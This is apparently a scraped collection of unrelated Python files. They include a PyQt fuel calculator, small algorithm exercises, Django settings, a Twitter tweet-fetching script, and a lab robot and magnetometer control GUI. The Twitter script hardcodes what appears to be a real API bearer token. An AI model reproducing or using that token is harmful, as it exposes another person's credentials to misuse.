YakitHesaplayici(QDialog):\r\n def __init__(self, ebeveyn=None, parent=None):\r\n 
super(YakitHesaplayici,self).__init__(parent)\r\n\r\n grid=QGridLayout()\r\n\r\n # birinci satır kodu\r\n grid.addWidget(QLabel(\"gidilen yol\"),0,0)\r\n self.gidilenyol=QLineEdit()\r\n self.gidilenyol.setInputMask(\"00000\")\r\n grid.addWidget(self.gidilenyol,0,1)\r\n\r\n\r\n # ikinci satır kodu\r\n grid.addWidget(QLabel(\"yakıtın litre fiyatı\"),1,0)\r\n self.yakitfiyati=QLineEdit()\r\n self.yakitfiyati.setInputMask(\"0.0\")\r\n grid.addWidget(self.yakitfiyati,1,1)\r\n\r\n #üçüncü satır kodu\r\n grid.addWidget(QLabel(\"100 km de tüketilen yakıt\"),2,0)\r\n self.tuketilen = QLineEdit()\r\n self.tuketilen.setInputMask(\"00.0\")\r\n grid.addWidget(self.tuketilen,2,1)\r\n\r\n #dördüncü satır\r\n grid.addWidget(QLabel(\"toplam tutar:\"),3,0)\r\n self.toplamtutar=QLabel(\"\")\r\n grid.addWidget(self.toplamtutar,3,1)\r\n\r\n #beşinci satır\r\n hesapla=QPushButton(\"hesapla\")\r\n hesapla.clicked.connect(self.hesap)\r\n grid.addWidget(hesapla,4,0,1,2)\r\n\r\n self.setLayout(grid)\r\n self.setWindowTitle(\"Yakıt Hesaplayıcısı\")\r\n\r\n def hesap(self):\r\n yol=int(self.gidilenyol.text())\r\n fiyat=float(self.yakitfiyati.text())\r\n tuketim=float(self.tuketilen.text())\r\n sonuc=fiyat*(yol*tuketim)/100\r\n self.toplamtutar.setText(\"<font color='blue'>%0.2f</font>\"%sonuc)\r\n\r\n\r\n\r\n\r\n\r\n\r\napp=QApplication([])\r\npencere=YakitHesaplayici()\r\npencere.show()\r\napp.exec()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"emree35e35/Simple-python-projects","sub_path":"Yakıt hesaplama.py","file_name":"Yakıt hesaplama.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13928787011","text":"from functools import reduce\n\n\ndef list2int(a: list) -> int:\n return reduce(lambda x, y: x*10+y, a)\n\n\ndef int2list(a: int) -> list:\n a = list(str(a))\n return map(lambda x: int(x), a)\n\n\ndef format_black_holes(black_hole_numbers: list) -> tuple:\n black_hole_number_groups = []\n while len(black_hole_numbers) > 0:\n current_group = []\n current_number = black_hole_numbers[0]\n while current_number in black_hole_numbers:\n current_group.append(current_number)\n black_hole_numbers.remove(current_number)\n minimum = list2int(sorted(int2list(current_number)))\n maximum = list2int(sorted(int2list(current_number), reverse=True))\n current_number = maximum - minimum\n black_hole_number_groups.append(tuple(current_group))\n return tuple(black_hole_number_groups)\n","repo_name":"Ninzero/BlackHoleNumber","sub_path":"CommonFunction.py","file_name":"CommonFunction.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27980569601","text":"class Solution(object):\n def merge(self, nums1, m, nums2, n):\n res = []\n cur1, cur2 = 0, 0\n for i in range(m+n):\n if cur1 == m:\n self.append_rest(cur2, nums2, res, n)\n break\n if cur2 == n:\n self.append_rest(cur1, nums1, res, m)\n break\n if nums1[cur1] <= nums2[cur2]:\n res.append(nums1[cur1])\n cur1 += 1\n else:\n res.append(nums2[cur2])\n cur2 += 1\n return res\n\n def append_rest(self,cur, nums, res, bound):\n for j in range(cur, bound):\n res.append(nums[j])\n\nif __name__ == '__main__':\n s = Solution()\n 
print(s.merge([1,2,3,0,0,0],3,[2,5,6],3))\n","repo_name":"KShih/workspaceLeetcode","sub_path":"python/88_MergeSortedArray.py","file_name":"88_MergeSortedArray.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17270972127","text":"import torch\nfrom collections import OrderedDict\n#%%\ndef rename_emb_key(filename):\n\n checkpoint = torch.load(filename)\n model_state_dict_new = OrderedDict()\n checkpoint_new = OrderedDict()\n \n for key, value in checkpoint['model_state_dict'].items():\n new_key = key\n if key == \"emb_id.weight\":\n new_key = \"emb.0.weight\" \n if key == \"emb.weight\":\n new_key = \"emb.0.weight\" \n \n model_state_dict_new[new_key] = value\n \n for key, value in checkpoint.items():\n value_new = value\n if key == 'model_state_dict':\n value_new = model_state_dict_new\n \n checkpoint_new[key] = value_new\n \n torch.save(checkpoint_new, filename)\n \ndataset_name = 'uci_traffic'\n\nexperiment_dir = 'experiments/'+dataset_name\nalgorithm = 'transformer_conv'\nseeds = 10\nfor seed in range(seeds):\n filename = f'{experiment_dir}/{algorithm}/{algorithm}_seed={seed}' \n rename_emb_key(filename)","repo_name":"elephaint/pedpf","sub_path":"lib/rename_emb_key.py","file_name":"rename_emb_key.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"26303623734","text":"from mcpi.minecraft import Minecraft\nfrom mcpi import block\nfrom time import sleep\nimport random\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport math\ncolours = [ (255, 255, 255, \"00\"),\n (255, 0, 0, \"14\"),\n (255, 128, 0, \"01\"),\n (0, 255, 0, \"13\"),\n (255,128,255,\"02\"),\n (50,50,255,\"03\"),\n (255,255,0,\"04\"),\n (50,255,50,\"05\"),\n (255,102,178,\"06\"),\n (96,96,96,\"07\"),\n (192,192,192,\"08\"),\n (0,200,200,\"09\"),\n (150,0,150,\"10\"),\n (0,0,255,\"11\"),\n (102,51,0,\"12\"),\n (0,0,0,\"15\")]\n \n\n\ndef nearest_colour( subjects, query ):\n return min(subjects,key = lambda subject:sum((s - q) ** 2 for s,q in zip( subject, query ) ) )\n\n\n#print( nearest_colour( colours, (64, 0, 0) ) ) # dark red\n#print( nearest_colour( colours, (0, 192, 0) ) ) # green\n#print( nearest_colour( colours, (255, 255, 64) ) ) # white\n\ndef init():\n\t#ipString = \"127.0.0.1\"\n\tipString = \"192.168.7.226\"\n\t#mc = Minecraft.create(\"127.0.0.1\", 4711)\n\tmc = Minecraft.create(ipString, 4711)\n\tmc.setting(\"world_immutable\",False)\n\t#x, y, z = mc.player.getPos() \n\treturn mc\ndef open_image(path):\n newImage = Image.open(path)\n return newImage\n\n# Save Image\ndef save_image(image, path):\n image.save(path, 'png')\n\n# Create a new image with the given size\ndef create_image(i, j):\n image = Image.new(\"RGB\", (i, j), \"white\")\n return image\n\n# Get the pixel from the given image\ndef get_pixel(image, i, j):\n # Inside image bounds?\n width, height = image.size\n if i > width or j > height:\n return None\n\n # Get Pixel\n pixel = image.getpixel((i, j))\n return pixel\n \ndef main():\n\tmc = init()\n\tlst=[]\n\t#img=open_image(\"loss.png\")\n\t#img =create_image(10,10)\n\tx,y,z=mc.player.getPos()\n\t\n\t#plt.imshow(img);\n\tselection=input(\"what is the name of your file? 
must contain the extension: \")\n\timg = Image.open(selection);\n\timg=img.convert('RGB')\n\tpx=img.load()\n\t#plt.show();\n\tfor i in range(0,img.width):\n\t\tfor j in range(0,img.height):\n\t\t\tcoord=(-i,abs(img.height-1-j))\n\t\t\tbloop=(img.getpixel(coord))\n\t\t\tprint(bloop)\n\t\t\twoolcolor=str(nearest_colour(colours, bloop))\n\t\t\t#print(woolcolor)\n\t\t\twoolcolor=(woolcolor[-4:])\n\t\t\twoolcolor=(woolcolor[:2])\n\t\t\tprint(woolcolor)\n\t\t\t#lst.append(woolcolor)\n\t\t\tmc.setBlock(x+5+i,y+j,z,35,int(woolcolor))\n\t\t\t#print(nearest_colour(colours, px[i,j]))\n\t#print(lst)\t\t\n\tprint(img.size)\n\t\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"piluvr/mcpi-piluvr","sub_path":"imageparse.py","file_name":"imageparse.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74538230970","text":"\"\"\"Constants for use in minesweeper.py\"\"\"\n\n# General options\nFPS = 120\nINIT_SIZE = (500, 500)\nPAD = 2\nFONT_NAME = \"Ubuntu Mono\"\nFONT_MIN_SIZE = 10\nFONT_MAX_SIZE = 30\n\n# Minesweeper config\nNUM_BOXES = 10 # The number of boxes on each side. The total number of boxes is this^2\nMINE_PROBABILITY = .2\n\n# Colours\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nGREY = (169, 169, 169)\nDARK_GREY = (128,128,128)\n","repo_name":"ch0rl/Minesweeper","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43323398864","text":"#author: Tobias Andermann, tobias.andermann@bioenv.gu.se\n\nimport os\nimport sys\nimport re\nimport glob\nimport shutil\nimport argparse\nimport csv\nimport random\n\n\nfrom .utils import CompletePath\n\n\n# Get arguments\ndef get_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"This script will create consensus sequences from pairs of allele sequences, thereby turning allele alignments into consensus alignments.\",\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter\n\t)\n\tparser.add_argument(\n\t\t'--input',\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\tdefault=None,\n\t\thelp='The directory containing fasta alignments'\n\t)\n\tparser.add_argument(\n\t\t'--config',\n\t\trequired=True,\n\t\thelp='A configuration file containing the full paths to the following programs: samtools, bcftools, vcfutils, emboss, picard. 
Also the paths to either clc-assembly-cell or bwa, depending on which of these two mapping softwares is chosen (see --mapper)'\n\t)\n\tparser.add_argument(\n\t\t'--output',\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\tdefault=None,\n\t\thelp='The output directory where results will be safed'\n\t)\n\n\treturn parser.parse_args()\n\n\t\n# Get arguments\nargs = get_args()\n# Set working directory\nwork_dir = args.input\nout_dir = args.output\t\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\nconfig = args.config\n\n\t\n\t\n\t\n\t\n#XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n#%%% Functions %%%\n\t\n\t\ndef read_fasta(fasta):\n\tname, seq = None, []\n\tfor line in fasta:\n\t\tline = line.rstrip()\n\t\tif line.startswith(\">\"):\n\t\t\tif name: yield (name, ''.join(seq))\n\t\t\tname, seq = line, []\n\t\telse:\n\t\t\tseq.append(line)\n\tif name: yield (name, ''.join(seq))\n\n\t\t\n\t\t\n#XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n#%%% Workflow %%%\t\n\n# Read in config file\nwith open(config, 'r') as c:\n\tconf_dict = {}\n\treader = csv.reader(c, delimiter='\\t')\n\treader = list(reader)\n\tfor row in reader:\n\t\tconf_dict.setdefault(row[1],[])\n\t\tconf_dict[row[1]].append(row[0])\n\n\n# Create a list of all fasta files\nfasta_files = []\t\nfor fasta in os.listdir(work_dir):\n\tif fasta.endswith(\".fasta\") or fasta.endswith(\".fa\"):\n\t\tfasta_files.append(fasta)\n\n\nfor fasta in fasta_files:\n\n\t# Create an output consensus fasta file for each allele alignment\n\tfasta_cons_name = re.sub(\"allele\",\"consensus\",fasta)\n\tout_fasta = open(os.path.join(out_dir, fasta_cons_name), 'w')\n\t\n\t# Create a dictionary for each fasta file, where both allele sequences are assigned to the same key for each sample\n\tseq_dict = {}\n\tfor seq_pair in list(conf_dict.values()):\n\t\tkey = list(conf_dict.keys())[list(conf_dict.values()).index(seq_pair)]\n\t\t#print seq_pair[0], \"=\", key\n\t\t#print seq_pair[1], \"=\", key\n\t\twith open(\"%s/%s\" %(work_dir,fasta)) as f:\n\t\t\tfor name, seq in read_fasta(f):\n\t\t\t\tname = re.sub('>', '', name)\n\t\t\t\tif name in seq_pair:\n\t\t\t\t\tname = key\n\t\t\t\t\tseq_dict.setdefault(name,[])\n\t\t\t\t\tseq_dict[name].append(seq)\n\t# Create a consensus dict for each fasta file with the correct new header name as key and the consensus sequence of the two alleles as value\n\tconsensus_dict = {}\n\tfor header in seq_dict:\n\t\tconsensus_dict.setdefault(header,[])\n\t\tsequence = seq_dict[header]\n\t\tallele0 = sequence[0]\n\t\tallele1 = sequence[1]\n\t\t# Find those positions where the two alleles differ from each other and make a random pick of one of the versions, simulationg a consensus sequence\n\t\tfor id, base in enumerate(allele0):\n\t\t\tif base != allele1[id]:\n\t\t\t\tvariation = [base,allele1[id]]\n\t\t\t\tbase = random.choice(variation)\n\t\t\tconsensus_dict[header].append(base)\n\t# Write the consensus dictionary into a fasta output file\n\tfor cons_header in consensus_dict:\n\t\tcons_sequence = \"\".join(consensus_dict[cons_header])\n\t\tcons_header = \">%s\" 
%cons_header\n\t\tout_fasta.write(cons_header+\"\\n\")\n\t\tout_fasta.write(cons_sequence+\"\\n\")\n\t\n\tout_fasta.close()\n\t\t\n\t\t\n\n\t\n","repo_name":"AntonelliLab/seqcap_processor","sub_path":"secapr/create_consensus_from_alleles.py","file_name":"create_consensus_from_alleles.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"36722781775","text":"# https://docs.djangoproject.com/en/3.1/ref/settings/\n\nimport os\nfrom datetime import timedelta\nfrom pathlib import PurePath\nfrom typing import Tuple\n\nfrom django.utils.translation import ugettext_lazy as ugt\n\nfrom celery.schedules import crontab\nfrom decouple import config\nfrom dj_database_url import parse as db_url\n\n\n# Build paths inside the project like this: BASE_DIR.joinpath('some')\n# `pathlib` is better than writing: dirname(dirname(dirname(__file__)))\n# backend/\nBASE_DIR = PurePath(__file__).parent.parent.parent\n\n\ndef base_dir_join(*args):\n return os.path.join(BASE_DIR, *args)\n\n\nSITE_ID = 1\n\nSECURE_HSTS_PRELOAD = True\n\nDEBUG = True\n\nSECRET_KEY = config(\"DJANGO_SECRET_KEY\")\n\nADMINS = ((\"Admin\", \"foo@example.com\"),)\n\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\"]\n\n# APP CONFIGURATION\n# ------------------------------------------------------------------------------\nDJANGO_APPS: Tuple[str, ...] = (\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"django.contrib.admin\",\n)\n\nLOCAL_APPS: Tuple[str, ...] = (\n \"common\",\n \"apps.users\",\n \"apps.meta\",\n \"apps.projects\",\n \"apps.delivery\",\n)\n\nTHIRD_PARTY_APPS: Tuple[str, ...] 
= (\n \"corsheaders\",\n \"rest_framework\",\n \"rest_framework_simplejwt.token_blacklist\",\n # 'django_extensions',\n)\n# CORS\n# ------------------------------------------------------------------------------\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_CREDENTIALS = True # to accept cookies via ajax request\nCORS_ORIGIN_WHITELIST = [\n # the domain for front-end app(you can add more than 1)\n \"http://localhost:3000\",\n]\nCORS_ALLOWED_ORIGIN_REGEXES = [\n r\"^https://\\w+\\.heroku\\.com$\",\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\nAUTH_USER_MODEL = \"users.User\"\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"corsheaders.middleware.CorsMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"onlineBenevolent.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [base_dir_join(\"templates\")],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\nASGI_APPLICATION = \"onlineBenevolent.asgi.application\"\n\nAUTH_PASSWORD_VALIDATORS = [\n {\"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",},\n {\"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",},\n {\"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",},\n {\"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",},\n]\n\n# DJANGO REST FRAMEWORK\n# ------------------------------------------------------------------------------\n\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework_simplejwt.authentication.JWTAuthentication\",\n ),\n \"DEFAULT_PERMISSION_CLASSES\": (\"rest_framework.permissions.IsAuthenticated\",),\n \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n \"PAGE_SIZE\": 20,\n}\n\nSIMPLE_JWT_SIGNING_KEY = config(\"SIMPLE_JWT_SIGNING_KEY\", cast=str, default=SECRET_KEY)\n\nSIMPLE_JWT = {\n \"ACCESS_TOKEN_LIFETIME\": timedelta(days=1),\n \"REFRESH_TOKEN_LIFETIME\": timedelta(days=7),\n \"SIGNING_KEY\": SIMPLE_JWT_SIGNING_KEY,\n \"AUTH_HEADER_TYPES\": (\"Bearer\",),\n \"USER_ID_CLAIM\": \"id\",\n \"AUTH_TOKEN_CLASSES\": (\"rest_framework_simplejwt.tokens.AccessToken\",),\n \"TOKEN_TYPE_CLAIM\": \"token_type\",\n}\n\n# Email\nEMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n \"default\": config(\"DATABASE_URL\", cast=db_url),\n}\nDATABASES[\"default\"][\"ENGINE\"] = config(\"DATABASE_ENGINE\", cast=str, default=None)\nDATABASES[\"default\"][\"CONN_MAX_AGE\"] = config(\"POSTGRES_CONN_MAX_AGE\", cast=int, default=60)\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = 
True\n\nUSE_TZ = True\n\nLANGUAGES = (\n (\"en\", ugt(\"English\")),\n (\"ar\", ugt(\"Arabic\")),\n)\n\nSTATICFILES_DIRS = (base_dir_join(\"static\"),)\n\nINSTALLED_APPS += (\"drf_yasg\",)\n\n# drf_yasg\nSWAGGER_SETTINGS = {\n \"DEFAULT_INFO\": \"onlineBenevolent.urls.api_info\",\n \"REFETCH_SCHEMA_WITH_AUTH\": True,\n \"SECURITY_DEFINITIONS\": {\n \"api_key\": {\"type\": \"apiKey\", \"in\": \"header\", \"name\": \"Authorization\"}\n },\n}\n\n# Celery\nCELERY_ACCEPT_CONTENT = [\"json\", \"msgpack\"]\nCELERY_TASK_SERIALIZER = \"json\"\nCELERY_RESULT_SERIALIZER = \"json\"\nCELERY_ACKS_LATE = True\nCELERY_TIMEZONE = TIME_ZONE\n\n# Celery\nBROKER_HOST = config(\"RABBITMQ_HOST\", default=\"rabbitmq\")\nBROKER_USER = config(\"RABBITMQ_DEFAULT_USER\", default=\"online_benevolent\")\nBROKER_PASSWORD = config(\"RABBITMQ_DEFAULT_PASS\", default=\"online_benevolent\")\nBROKER_VHOST = config(\"RABBITMQ_DEFAULT_VHOST\", default=\"online_benevolent\")\nBROKER_URL = \"amqp://{0}:{1}@{2}:5672\".format(BROKER_USER, BROKER_PASSWORD, BROKER_HOST)\nBROKER_TRANSPORT_OPTIONS = {\n \"max_connections\": 2,\n}\nBROKER_POOL_LIMIT = None\nBROKER_CONNECTION_MAX_RETRIES = None\nCELERY_BROKER_URL = BROKER_URL\nCELERY_SEND_TASK_ERROR_EMAILS = True\n# CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend',\nCELERY_RESULT_BACKEND = config(\"CELERY_BACKEND\", \"redis://redis:6379/0\")\n\nCELERY_BEAT_SCHEDULE = {\n \"generate_delivery_patch\": {\n \"task\": \"apps.delivery.tasks.task_process_periodically_add_patches\",\n \"schedule\": crontab(hour=\"4\", minute=0),\n },\n \"sample_task\": {\"task\": \"apps.delivery.tasks.sample_task\", \"schedule\": crontab(minute=\"*/1\"),},\n}\n","repo_name":"abodacs/django-fullstack-biolerplate","sub_path":"backend/onlineBenevolent/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"48411100767","text":"# This is a sample Python script.\n\nimport csv\nfrom math import floor\n\n\ndef quarter1(list, week):\n LEN = len(list)\n if LEN % 2 == 0:\n med = quarter2(list[0: int(LEN / 2)], week)\n else:\n med = quarter2(list[0: int(floor(LEN / 2))], week)\n return med\n\n\n# This is equivalent to median\ndef quarter2(list, week):\n LEN = len(list)\n if LEN % 2 == 0:\n med = .5 * (list[int(LEN / 2) - 1][f'Week {week}'] + list[int(LEN / 2)][f'Week {week}'])\n else:\n med = list[int(floor(LEN / 2))][f'Week {week}']\n return med\n\n\ndef quarter3(list, week):\n LEN = len(list)\n if LEN % 2 == 0:\n med = quarter2(list[int(LEN / 2): LEN], week)\n else:\n med = quarter2(list[int((LEN / 2)): LEN], week)\n return med\n\n\ndef tukey_range(Q1, Q3):\n return [Q1 - 1.5 * (Q3 - Q1), Q3 + 1.5 * (Q3 - Q1)]\n\n\ndef print_participants_in_order(out_of_order, in_order, week):\n for p1 in in_order:\n for p2 in out_of_order:\n if p1.get('Name') == p2.get('Name'):\n print(\"\\t{} {}\".format(p1.get('Name'), p1.get(f'Week {str(week)}')))\n\n\nif __name__ == '__main__':\n participants = []\n with open('participants.csv', 'r', newline='') as participants_file:\n reader = csv.DictReader(participants_file)\n for row in reader:\n participants.append({'Name': row['Name'], 'Week 1': float(row['Week 1']), 'Week 2': float(row['Week 2']),\n 'Week 3': float(row['Week 3'])})\n\n original_participant_list = participants\n for week in range(1, 4):\n sorted_list = sorted(participants, key=lambda k: k[f'Week {week}'])\n print(f'Week: {week}')\n print(f'Q1: {quarter1(sorted_list, 
week)}')\n print(f'Q2: {quarter2(sorted_list, week)}')\n print(f'Q3: {quarter3(sorted_list, week)}')\n print(f'Tukey\\'s Range: {tukey_range(quarter1(sorted_list, week), quarter3(sorted_list, week))}')\n print(f'Outliers:')\n outliers = []\n for participant in sorted_list:\n if participant[f'Week {week}'] < tukey_range(quarter1(sorted_list, week), quarter3(sorted_list, week))[0]:\n outliers.append(participant)\n print_participants_in_order(outliers, original_participant_list, week)\n\n print()\n","repo_name":"gjclark14/MachineLearningProject1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32796326025","text":"import requests\nimport os\nimport json\nimport sqlite3\nfrom sqlite3 import Error\nimport time\nimport random\n\n# To set your enviornment variables in your terminal run the following line:\n# export 'BEARER_TOKEN'='<your_bearer_token>'\n\ntoken = \"AAAAAAAAAAAAAAAAAAAAAN9cJQEAAAAAVr3OCBek5GZit3lRVnl7vEtkO2k%3DE9cuhlYwNv0YM7Kn20f1lWoWuVpp90BOVpAfa5rVWYDTAhumxL\"\n\n\n\ndef auth():\n return token\n\n\ndef create_url(ids):\n tweet_fields = \"tweet.fields=text,created_at,geo,lang,author_id\"\n # Tweet fields are adjustable.\n # Options include:\n # attachments, author_id, context_annotations,\n # conversation_id, created_at, entities, geo, id,\n # in_reply_to_user_id, lang, non_public_metrics, organic_metrics,\n # possibly_sensitive, promoted_metrics, public_metrics, referenced_tweets,\n # source, text, and withheld\n ids = \"ids=\"+\",\".join(ids)\n # You can adjust ids to include a single Tweets.\n # Or you can add to up to 100 comma-separated IDs\n url = \"https://api.twitter.com/2/tweets?{}&{}\".format(ids, tweet_fields)\n return url\n\n\ndef create_headers(bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n\ndef connect_to_endpoint(url, headers):\n response = requests.request(\"GET\", url, headers=headers)\n print(response.status_code)\n if response.status_code != 200:\n raise Exception(\n \"Request returned an error: {} {}\".format(\n response.status_code, response.text\n )\n )\n return response.json()\n\ndef add_tweet(conn, tweet):\n \"\"\"\n Create a new equity_line into the utils_data_logs_equity table\n :param conn:\n :param equity_line:\n :return: equity_line id\n \"\"\"\n sql = ''' INSERT INTO tweet_db(place,tweet_id,author_id,text,geo,lang,created_at)\n VALUES(?,?,?,?,?,?,?) 
'''\n cur = conn.cursor()\n cur.execute(sql, tweet)\n conn.commit()\n return cur.lastrowid\n\ndef divide_chunks(l, n): \n for i in range(0, len(l), n): \n yield l[i:i + n] \n \n\ndef main():\n # ids = open('2016-pres-geo.txt').readlines()\n # writer = open(\"2016-pres-geo-2M.txt\", 'w+')\n # existing_ids = open(\"2016-pres-geo-1M.txt\").readlines()\n # existing_ids = [i.strip() for i in existing_ids]\n # ids = [i.strip() for i in ids]\n # print(len(ids))\n # #ids = [i for i in ids if i not in existing_ids]\n # print(len(ids))\n # x = 0\n # while x < 1000000:\n # curr_id = random.choice(ids)\n # if curr_id not in existing_ids:\n # writer.write(curr_id + '\\n')\n # x += 1\n # if x%100 == 0:\n # print(x)\n\n bearer_token = auth()\n ids = open('2020-pres-geo.txt').readlines()\n ids = [i.strip() for i in ids]\n indexes = range(len(ids))\n indexes_index = 0\n con = sqlite3.connect(r'tweet2020.sqlite3')\n ids = list(divide_chunks(ids, 100))\n total = len(ids)\n for index, tweets in enumerate(ids):\n starttime = time.time()\n url = create_url(tweets)\n headers = create_headers(bearer_token)\n json_response = connect_to_endpoint(url, headers)\n data = json.loads(json.dumps(json_response, indent=4, sort_keys=True))\n data = data['data']\n for item in data:\n geo = None\n author_id = None\n created_at = None\n tweet_id = None\n lang = None\n text = None\n try:\n geo = item['geo']['place_id']\n except:\n geo = None\n try:\n author_id = item['author_id']\n except:\n author_id = None\n try:\n created_at = item['created_at']\n except:\n created_at = None\n try:\n tweet_id = item['id']\n except:\n tweet_id = None\n try:\n lang = item['lang']\n except:\n lang = None\n try:\n text = item['text']\n except:\n text = None\n tweet_data = [indexes[indexes_index],tweet_id, author_id, text, geo, lang, created_at]\n indexes_index += 1\n add_tweet(con, tweet_data)\n if 3 - ((time.time() - starttime) % 60.0) <= 0:\n continue\n else:\n time.sleep(3 - ((time.time() - starttime) % 60.0))\n print(index, \" out of \", total)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","repo_name":"CharlieRay668/SRScode","sub_path":"twitterapi.py","file_name":"twitterapi.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39149454978","text":"from control import Ui_MainWindow\nfrom PyQt5 import QtWidgets, QtCore\n\nimport sys, esp300, gauss460, time\n\nimport numpy as np\n\nfrom time import sleep\n\nclass RobotControl(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n super(RobotControl, self).setupUi(self)\n\n self.esp = esp300.esp300(1,0)\n self.gauss = gauss460.gauss460(8,1)\n\n self.scanning = False\n\n pos_updater = QtCore.QTimer(self)\n\n def update():\n if not self.scanning:\n self.a1_pos.setText(str(self.esp.axis1.pos) + \" mm\")\n self.a2_pos.setText(str(self.esp.axis2.pos) + \" mm\")\n self.a3_pos.setText(str(self.esp.axis3.pos) + \" mm\")\n\n field = self.gauss.allf()\n\n self.x_val.setText(str(field[0]))\n self.y_val.setText(str(field[1]))\n self.z_val.setText(str(field[2]))\n self.mag_val.setText(str(field[3]))\n\n pos_updater.timeout.connect(update)\n pos_updater.start(100)\n\n # Axis 1 Controls\n\n self.a1_left.clicked.connect(\n lambda _: setattr(self.esp.axis1, 'pos', self.esp.axis1.pos - self.a1_step.value())\n )\n self.a1_right.clicked.connect(\n lambda _: setattr(self.esp.axis1, 'pos', self.esp.axis1.pos + self.a1_step.value())\n )\n 
self.a1_zero.clicked.connect(\n lambda _: self.esp.axis1.go_home()\n )\n\n # Axis 2 Controls\n\n self.a2_left.clicked.connect(\n lambda _: setattr(self.esp.axis2, 'pos', self.esp.axis2.pos - self.a2_step.value())\n )\n self.a2_right.clicked.connect(\n lambda _: setattr(self.esp.axis2, 'pos', self.esp.axis2.pos + self.a2_step.value())\n )\n self.a2_zero.clicked.connect(\n lambda _: self.esp.axis2.go_home()\n )\n\n # Axis 3 Controls\n\n self.a3_left.clicked.connect(\n lambda _: setattr(self.esp.axis3, 'pos', self.esp.axis3.pos - self.a3_step.value())\n )\n self.a3_right.clicked.connect(\n lambda _: setattr(self.esp.axis3, 'pos', self.esp.axis3.pos + self.a3_step.value())\n )\n self.a3_zero.clicked.connect(\n lambda _: self.esp.axis3.go_home()\n )\n\n self.auto_savedir_button.clicked.connect(self.set_savedir)\n\n def scan():\n if self.quantity_combo.currentText() == \"Gradient\":\n 